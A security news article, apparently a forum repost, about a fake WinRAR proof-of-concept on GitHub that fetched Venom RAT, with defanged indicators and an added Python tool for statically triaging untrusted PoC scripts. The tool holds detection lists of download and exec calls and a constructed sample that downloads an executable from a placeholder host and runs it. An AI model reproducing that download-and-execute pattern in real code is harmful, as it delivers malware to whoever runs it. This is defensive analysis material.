Deceptive GitHub PoC Exploit Aims to Distribute Venom RAT Malware Under Guise of WinRAR Vulnerability


dEEpEst


A deceptive proof-of-concept (PoC) exploit was uploaded to GitHub by an attacker intending to infect anyone who downloaded and ran the code with Venom RAT malware. The fake PoC claimed to exploit a known WinRAR flaw, but in reality it was based on a script for a SQL injection issue in GeoServer software, tracked as CVE-2023-25157, according to Robert Falcone from Palo Alto Networks Unit 42.


Fake PoCs aimed at the cybersecurity research community are not new, but it appears that the bad actors are also targeting other criminals who want to add new vulnerabilities to their toolkit.


The GitHub account that hosted this misleading PoC, under the username whalersplonk, has been taken down. Records indicate that the PoC was uploaded on August 21, 2023, just a few days following the public disclosure of the WinRAR vulnerability, tagged as CVE-2023-40477. This specific WinRAR vulnerability, which could allow remote code execution on Windows systems, was patched last month with WinRAR version 6.23.


whalersplonk, the GitHub account that hosted the repository, is no longer accessible. The PoC is said to have been committed on August 21, 2023, four days after the vulnerability was publicly announced.


CVE-2023-40477 relates to an improper validation issue in the WinRAR utility that could be exploited to achieve remote code execution (RCE) on Windows systems. It was addressed last month by the maintainers in WinRAR 6.23, alongside another actively exploited flaw tracked as CVE-2023-38831.


An analysis of the repository reveals a Python script and a Streamable video demonstrating how to use the exploit. The video attracted 121 views in total.


Rather than carrying out any exploit, the Python script reaches out to a remote server (checkblacklistwords[.]eu) to fetch an executable named Windows.Gaming.Preview.exe, which is a variant of Venom RAT. The RAT can list running processes and receive commands from an actor-controlled server (94.156.253[.]109).
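The download-and-execute pattern described above is exactly what a reviewer should look for before running a PoC pulled from a public repository. The following is an added example, not code from the original post or from Unit 42: it parses an untrusted Python PoC with the `ast` module (the PoC itself is never executed), flags calls that fetch remote content or launch a process, and checks string literals against the defanged indicators quoted in the article. `SAMPLE_POC` and `BENIGN_POC` are constructed for the demonstration, the URL in the sample uses a placeholder host rather than the real one, and all function names are this example's own.

```python
"""Static triage of an untrusted proof-of-concept script before anyone runs it.

Added example: the PoC is parsed, never imported or executed. Findings are
(a) calls that download content, (b) calls that launch a process or evaluate
code, (c) literals containing an indicator from the article, (d) any URLs.
"""
import ast
import re

# Indicators as quoted in the article, kept defanged in source.
ARTICLE_IOCS = ["checkblacklistwords[.]eu", "94.156.253[.]109", "Windows.Gaming.Preview.exe"]

# Fully qualified call targets that download content or run something.
FETCH_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.create_connection",
}
EXEC_CALLS = {
    "os.system", "os.startfile", "os.popen", "os.execv",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "exec", "eval",
}
URL_RE = re.compile(r"https?://[^\s'\"]+")


def refang(ioc):
    """Turn a defanged indicator back into its literal form for matching."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def import_aliases(tree):
    """Map local names to qualified ones, e.g. {'Popen': 'subprocess.Popen', 'rq': 'requests'}."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = a.name
                else:  # `import urllib.request` binds the top-level name `urllib`
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def qualified_name(func, aliases):
    """Resolve the callee of a Call node to a dotted name, following import aliases."""
    parts, node = [], func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None  # callee is a subscript, another call's result, etc.
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage(source, iocs=ARTICLE_IOCS):
    """Return a dict of findings plus a verdict for a PoC's source text."""
    tree = ast.parse(source)
    aliases = import_aliases(tree)
    refanged = [refang(i) for i in iocs]
    findings = {"fetch": [], "exec": [], "ioc_hits": [], "urls": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = qualified_name(node.func, aliases)
            if name in FETCH_CALLS:
                findings["fetch"].append((name, node.lineno))
            elif name in EXEC_CALLS:
                findings["exec"].append((name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            findings["urls"].extend(URL_RE.findall(node.value))
            findings["ioc_hits"].extend(i for i in refanged if i in node.value)
    findings["ioc_hits"] = sorted(set(findings["ioc_hits"]))
    if findings["ioc_hits"]:
        verdict = "known-bad indicator present"
    elif findings["fetch"] and findings["exec"]:
        verdict = "download-and-execute pattern"  # the behaviour the article describes
    elif findings["fetch"] or findings["exec"]:
        verdict = "review manually"
    else:
        verdict = "no download/execute behaviour found"
    findings["verdict"] = verdict
    return findings


# Constructed sample modelled on the article's description: the "exploit" is a decoy,
# the real work is a download followed by a process launch. Placeholder host, not the real one.
SAMPLE_POC = '''
import urllib.request
from subprocess import Popen

def exploit(target):
    print("Sending crafted archive to", target)

url = "http://poc-host.example.invalid/Windows.Gaming.Preview.exe"
urllib.request.urlretrieve(url, "Windows.Gaming.Preview.exe")
Popen(["Windows.Gaming.Preview.exe"])
'''

# Constructed benign sample: inspects a local file and never touches the network.
BENIGN_POC = '''
import sys

def check(path):
    with open(path, "rb") as f:
        return f.read(4) == b"Rar!"

print(check(sys.argv[1]))
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_POC), ("benign", BENIGN_POC)):
        report = triage(src)
        print(f"{label}: {report['verdict']}")
        for kind in ("fetch", "exec", "ioc_hits", "urls"):
            if report[kind]:
                print(f"  {kind}: {report[kind]}")
```

The indicator check only catches literals that appear in plain text; a script that assembles its URL from fragments or decodes it at runtime will still show up through the fetch-plus-exec pattern, which is why the verdict is driven by behaviour first and indicators second.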


A closer examination of the attack infrastructure shows that the threat actor created the checkblacklistwords[.]eu domain at least 10 days prior to the public disclosure of the flaw, and then swiftly seized upon the criticality of the bug to attract potential victims.


"An unknown threat actor attempted to compromise individuals by releasing a fake PoC after the vulnerability's public announcement, to exploit an RCE vulnerability in a well-known application," Falcone said.


"This PoC is fake and does not exploit the WinRAR vulnerability, suggesting the actor tried to take advantage of a highly sought-after RCE in WinRAR to compromise others."
